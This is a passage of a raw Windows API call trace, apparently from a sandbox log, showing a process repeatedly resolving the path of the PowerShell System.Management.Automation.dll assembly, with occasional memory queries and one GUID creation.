out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.245] GetLastError () returned 0x0 [0152.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] VirtualQuery (in: lpAddress=0x23d254, lpBuffer=0x23e254, dwLength=0x1c | out: lpBuffer=0x23e254*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.246] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.247] GetLastError () returned 0x0 [0152.247] VirtualQuery (in: lpAddress=0x23d254, lpBuffer=0x23e254, dwLength=0x1c | out: lpBuffer=0x23e254*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.248] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] VirtualQuery (in: lpAddress=0x23d254, lpBuffer=0x23e254, dwLength=0x1c | out: lpBuffer=0x23e254*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.249] GetLastError () returned 0x0 [0152.249] VirtualQuery (in: lpAddress=0x23d254, lpBuffer=0x23e254, dwLength=0x1c | out: lpBuffer=0x23e254*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.250] GetLastError () returned 0x0 [0152.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.250] GetLastError () returned 0x0 [0152.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.250] GetLastError () returned 0x0 [0152.250] VirtualQuery (in: lpAddress=0x23ce84, lpBuffer=0x23de84, dwLength=0x1c | out: lpBuffer=0x23de84*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.250] VirtualQuery (in: lpAddress=0x23cec0, lpBuffer=0x23dec0, dwLength=0x1c | out: lpBuffer=0x23dec0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.250] VirtualQuery (in: lpAddress=0x23d188, lpBuffer=0x23e188, dwLength=0x1c | out: lpBuffer=0x23e188*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.296] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6d761811, Data2=0x5155, Data3=0x468f, Data4=([0]=0xbf, [1]=0x47, [2]=0x94, [3]=0xba, [4]=0xd4, [5]=0xf5, [6]=0xa6, [7]=0xff))) returned 0x0 [0152.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.297] GetLastError () returned 0x0 [0152.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.297] GetLastError () returned 0x0 [0152.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.297] GetLastError () returned 0x0 [0152.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.297] GetLastError () returned 0x0 [0152.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.297] GetLastError () returned 0x0 [0152.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.297] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.298] GetLastError () returned 0x0 [0152.298] GetFullPathNameW (in: 